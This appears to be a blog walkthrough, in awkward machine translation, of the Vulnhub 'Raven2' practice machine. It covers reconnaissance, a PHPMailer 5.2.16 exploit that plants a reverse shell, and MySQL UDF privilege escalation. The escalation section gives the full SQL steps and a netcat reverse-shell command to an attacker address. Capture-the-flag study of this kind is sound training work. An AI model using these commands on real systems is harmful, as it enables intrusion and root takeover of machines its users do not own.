当前位置:网站首页>Raven2 of vulnhub
Raven2 of vulnhub
2022-07-03 11:47:00 【Plum_ Flowers_ seven】
Only take personal study notes
Catalog
3、 ... and 、 Service version detection
1. Always requesting resources
7、 ... and 、mysql And udf Raise the right
One 、 The host found

Two 、 Port scanning

3、 ... and 、 Service version detection
routine 22,80 port .
111 This is an incomprehensible
42689 Open the remote process call protocol

Four 、 information gathering
1. Always requesting resources
It is the same as the original request for some foreign site resources , As a result, it cannot be loaded normally , Just hang a ladder . If you use burp, Just hang it on two floors .
It's a security company interface

2. Regular source code
Look at the interface , Source code leakage , Is there a hidden directory , None .
5、 ... and 、 Scan directory
The most basic information is wordpress Station building

1. /vendor
3,4,5 All the documents mentioned PHPMailer,readme It's a readme , It introduces phpmailer It's a php Mail transmission class ,. and security He mentioned his historical loopholes .changelog Tell the change log .
Try from phpmailer Make a breakthrough

(1)flag1

6、 ... and 、phpmailer
Because we can know from the above file that the version is 5.2.16, So try these .
1.40974.py
40974.py It can be used . Write bounce to target path shell file .

Be careful : You need to change the contents of the file before using
(1) Change back to the connection address
(2) Write the backdoor file path
(3) The goal is ip
You can also change the file name

2. Access trigger
3. rebound shell
7、 ... and 、mysql And udf Raise the right
When we collect information , It is found that there is leakage mysql Account and password ,
When checking the process , And found out mysql In order to root It belongs to the main operation , So we can use mysql Right to come ,
1. information gathering
root [email protected]

2.udf Raise the right
udf The original intention of the design is to facilitate users to customize some functions , It is convenient to query some complex data , At the same time, the use of udf The possibility of raising rights .
An attacker calls... By writing cmd perhaps shell Of udf.dll file , And import it into a specified folder Directory , Create a point to udf.dll The custom function of , Thus, the query in the database is equivalent to cmd perhaps shell Middle execution command .
3. step
(1) find kali Self contained udf Lift the right link library file .so

(2)64.so To the target plane
It's better to put /tmp Next
(3) Check the plug-in path
show variables like '%plugin%';
(4) Write to the database through the link library file
Using the system database , Create a table , Write link library file data .
use mysql;
create table a(line blob);
insert into a values(load_file('/tmp/x.so'));
(5) Then write the link library file to the plug-in location
select * from a into dumpfile '/usr/lib/mysql/plugin/x.so';
(6) Create a new function
create function sys_exec returns integer soname 'x.so';
(7) Execute bounce shell
select sys_exec('nc 192.168.0.107 6666 -e /bin/bash');

边栏推荐
- POI excel cell wrap
- After setting up ADG, instance 2 cannot start ora-29760: instance_ number parameter not specified
- Double linked list of linear list
- MySQL union和union all区别
- Excel表格转到Word中,表格不超边缘纸张范围
- Numpy np.max和np.maximum实现relu函数
- 同事写了一个责任链模式,bug无数...
- Web安全总结
- rxjs Observable filter Operator 的实现原理介绍
- 《剑指offer 03》数组中重复的数字
猜你喜欢

This article explains the complex relationship between MCU, arm, MCU, DSP, FPGA and embedded system

(database authorization - redis) summary of unauthorized access vulnerabilities in redis

836. Merge sets (day 63) and search sets

How to clean up v$rman_ backup_ job_ Details view reports error ora-02030

Excel表格转到Word中,表格不超边缘纸张范围

《剑指offer 04》二维数组查找

《剑指offer 03》数组中重复的数字

ftp登录时,报错“530 Login incorrect.Login failed”

Mmc5603nj geomagnetic sensor (Compass example)

PHP server interacts with redis with a large number of close_ Wait analysis
随机推荐
VS2015的下载地址和安装教程
Machine learning 3.2 decision tree model learning notes (to be supplemented)
Cadence background color setting
MySQL uses the method of updating linked tables with update
多维度监控:智能监控的数据基础
R语言ggplot2可视化:gganimate包创建动态折线图动画(gif)、使用transition_reveal函数在动画中沿给定维度逐步显示数据、在折线移动方向添加数据点
Excel quick cross table copy and paste
vulnhub之GeminiInc
DNS多点部署IP Anycast+BGP实战分析
Hongmeng third training (project training)
Cacti监控Redis实现过程
《剑指offer 03》数组中重复的数字
STL tutorial 10 container commonalities and usage scenarios
cgroup简介
Numpy np.max和np.maximum实现relu函数
Hongmeng fourth training
How to clean up v$rman_ backup_ job_ Details view reports error ora-02030
AI模型看看视频,就学会了玩《我的世界》:砍树、造箱子、制作石镐样样不差...
previous permutation lintcode51
2022 northeast four provinces match VP record / supplementary questions